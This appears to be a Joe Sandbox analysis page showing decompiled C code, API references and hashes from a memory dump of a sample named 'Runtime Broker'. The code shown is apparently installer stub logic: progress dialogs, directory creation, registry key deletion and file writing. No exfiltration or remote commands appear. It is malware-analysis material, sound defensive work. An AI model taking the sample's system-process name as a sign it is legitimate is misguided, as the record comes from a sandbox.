Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402FC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402FC6(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E0040696D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a270;
				if(_t6 >  *0x42a270) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a334 & 0x00000001;
					if(( *0x42a334 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402FAA());
						return E004055A4(0,  &_v132);
					}
				}
				return _t6;
			}

0x00402fd5
0x00402fd7
0x00402fde
0x00402fe1
0x00402fe1
0x00402fe7
0x00000000
0x00402fe7
0x00402fef
0x00402ff5
0x00000000
0x00402ff8
0x00402fff
0x00403005
0x0040300b
0x0040300d
0x00403013
0x00403051
0x0040305a
0x00000000
0x0040305f
0x00403015
0x0040301c
0x0040302d
0x00000000
0x0040303b
0x0040301c
0x00403067

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
GetTickCount.KERNEL32 ref: 00402FFF
wsprintfW.USER32 ref: 0040302D

Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F

CreateDialogParamW.USER32 ref: 00403051
ShowWindow.USER32(00000000,00000005), ref: 0040305F

Part of subcall function 00402FAA: MulDiv.KERNEL32(00000000,00000064,000066C7), ref: 00402FBF

Strings

... %d%%, xrefs: 00403027

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404E4D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e5b
0x00404e68
0x00404e6e
0x00404eac
0x00404eac
0x00404ebb
0x00404ec2
0x00000000
0x00404ec4
0x00404e70
0x00404e7f
0x00404e87
0x00404e8a
0x00404e9c
0x00404ea2
0x00404ea9
0x00000000
0x00404ea9
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
GetMessagePos.USER32 ref: 00404E70
ScreenToClient.USER32 ref: 00404E8A
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2

Strings

f, xrefs: 00404E9E

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A73, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A73(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a7e
0x00405a82
0x00405a85
0x00405a8b
0x00405a8f
0x00405a93
0x00405a9b
0x00405aa2
0x00405aa8
0x00405aaf
0x00405abe
0x00405ac0
0x00000000
0x00405ac0
0x00405aca
0x00405ad1
0x00405ae7
0x00000000
0x00000000
0x00000000
0x00405ae9
0x00405aed

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
GetLastError.KERNEL32 ref: 00405ACA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
GetLastError.KERNEL32 ref: 00405AE9

Strings

C:\Users\user\Desktop, xrefs: 00405A73
C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402F2B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402FAA();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a274 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402f3b
0x00402f49
0x00402f4f
0x00402f4f
0x00402f5d
0x00402f5f
0x00402f6b
0x00402f70
0x00402f72
0x00402f72
0x00402f7d
0x00402f8d
0x00402f9f
0x00402f9f
0x00402fa7

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
wsprintfW.USER32 ref: 00402F7D
SetWindowTextW.USER32(?,?), ref: 00402F8D
SetDlgItemTextW.USER32 ref: 00402F9F

Strings

verifying installer: %d%%, xrefs: 00402F72, 00402F7B
unpacking data: %d%%, xrefs: 00402F6B

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402947, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402947(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
				_t50 = E00402D3E(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405E88(_t50) == 0) {
					E00402D3E(0xffffffed);
				}
				E0040600D(_t50);
				_t26 = E00406032(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a278;
					 *(_t56 - 0x44) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403590(_t45);
						E0040357A(_t49,  *(_t56 - 0x44));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
						 *(_t56 - 0x10) = _t54;
						if(_t54 != _t45) {
							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x3c) =  *_t54;
								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x3c);
							}
							GlobalFree( *(_t56 - 0x10));
						}
						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402947
0x00402949
0x00402955
0x00402958
0x00402962
0x00402966
0x00402966
0x0040296c
0x00402979
0x00402981
0x00402984
0x0040298a
0x00402998
0x0040299d
0x004029a1
0x004029a4
0x004029ad
0x004029b9
0x004029bd
0x004029c0
0x004029ca
0x004029e9
0x004029d1
0x004029d6
0x004029de
0x004029e1
0x004029e6
0x004029e6
0x004029f0
0x004029f0
0x004029fd
0x00402a03
0x00402a15
0x00402a15
0x00402a1b
0x00402a1b
0x00402a26
0x00402a27
0x00402a2b
0x00402a2f
0x00402a35
0x00402a35
0x00402a3c
0x004022e9
0x00402bc5
0x00402bd1

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
GlobalFree.KERNEL32 ref: 004029F0
GlobalFree.KERNEL32 ref: 00402A03
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404D3F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404d48
0x00404d4d
0x00404d55
0x00404d56
0x00404d63
0x00404d6b
0x00404d6c
0x00404d6e
0x00404d70
0x00404d72
0x00404d75
0x00404d75
0x00404d7c
0x00404d82
0x00404d82
0x00404d89
0x00404d90
0x00404d93
0x00404d96
0x00404d96
0x00404d9a
0x00404daa
0x00404dac
0x00404daf
0x00404d58
0x00404d58
0x00404d5f
0x00404d5f
0x00404db7
0x00404dc2
0x00404dd8
0x00404de9
0x00404e05

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
wsprintfW.USER32 ref: 00404DE9
SetDlgItemTextW.USER32 ref: 00404DFC

Strings

%u.%u%s%s, xrefs: 00404DCA
H7B, xrefs: 00404DD2

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 81e6bb5195e7400279b778c86ac6a8681d5ba99035ba1ad4c9ee4d48c62e75c7
Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
Opcode Fuzzy Hash: 81e6bb5195e7400279b778c86ac6a8681d5ba99035ba1ad4c9ee4d48c62e75c7
Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402E41, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406931(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402e4c
0x00402e55
0x00402e5e
0x00402e6a
0x00402e73
0x00402e7d
0x00402ea2
0x00402ea8
0x00402ead
0x00402eae
0x00402ede
0x00402eb7
0x00402eb9
0x00402f09
0x00402f0c
0x00000000
0x00402f12
0x00402ec8
0x00402ecd
0x00402ecf
0x00000000
0x00000000
0x00402ed7
0x00402edc
0x00402edd
0x00402edd
0x00402eea
0x00402ef2
0x00402ef9
0x00000000
0x00402f22
0x00000000
0x00402f01
0x00402e8d
0x00402ea0
0x00000000
0x00000000
0x00000000
0x00402ea0
0x00402f28

APIs

RegEnumValueW.ADVAPI32 ref: 00402E95
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D1C(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402D3E(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402b08
0x00402b08
0x00402bc5
0x00402bd1

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
